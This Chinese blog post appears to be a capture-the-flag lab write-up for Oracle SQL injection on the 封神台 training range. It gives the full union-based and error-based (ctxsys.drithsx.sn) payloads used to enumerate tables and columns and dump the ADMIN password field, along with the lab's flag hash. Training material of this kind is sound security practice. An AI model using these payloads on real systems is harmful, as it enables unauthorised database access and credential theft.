封神台靶场-Oracle注入
2021-09-07 12:24
1671 查看
靶场
显错注入
判断注入存在
http://59.63.200.79:8808/?id=1 and 1=1 #页面正常 http://59.63.200.79:8808/?id=1 and 1=2 #页面异常
判断字段数
http://59.63.200.79:8808/?id=1 order by 4 # 页面正常 http://59.63.200.79:8808/?id=1 order by 5 # 页面异常 得出字段数为4
判断显错点
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar('a'),null,null from dual 得出显错点为第2位
信息收集,查询数据
# 查询表名 http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(table_name),null,null from user_tables where rownum=1 依次尝试得出最终表有:ADMIN,MD5,NEWS # 查询ADMIN表字段名 http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(column_name),null,null from user_tab_columns where rownum=1 and table_name ='ADMIN' 依次尝试得出ADMIN表字段有:UPASS,UNAME # 查询数据 由提示知,flag为UNAME='NF'对应的UPASS字段,所以我们直接查询 http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(UPASS),null,null from ADMIN where UNAME='NF' 得出最终flag:2a61f8bcfe7535eadcfa69eb4406ceb9
报错注入
查询表名
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))-- qwe and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN'))-- qwe and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN' and table_name != 'NEWS'))-- qwe
得出表名:ADMIN,NEWS,MD5
查询ADMIN表字段名
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN'))-- qwe and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN' and column_name != 'UNAME'))-- qwe
得出ADMIN表字段名:UNAME,UPASS
查询数据
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where UNAME='NF'))-- qwe
得出flag:2a61f8bcfe7535eadcfa69eb4406ceb9
相关文章推荐
- Oracle显错注入函数
- Oracle注入点信息基本检测
- 说几个oracle注入需要注意的地方
- asp.net使用ODP即oracle连接方式的的防注入登录验证程序
- Oracle 注入不能出网时获得一个交互式 Shell
- oracle 注入手册
- 安全检测Oracle注入点全过程
- 封神台靶场-第六章
- Webug靶场练习记录-注入篇
- oracle注入经典文章
- Oracle注入经典文章
- 三种不需要盲注的oracle注入工具
- 封神台靶场-第四章
- asp.net使用ODP即oracle连接方式的的防注入登录验证程序
- oracle注入,utl_http方法
- Oracle注入sys_context利用
- 【转载】犀利的 oracle 注入技术
- Oracle 数据库注入技能
- Oracle也有注入漏洞
- 对著名快递公司的一次艰难的oracle注入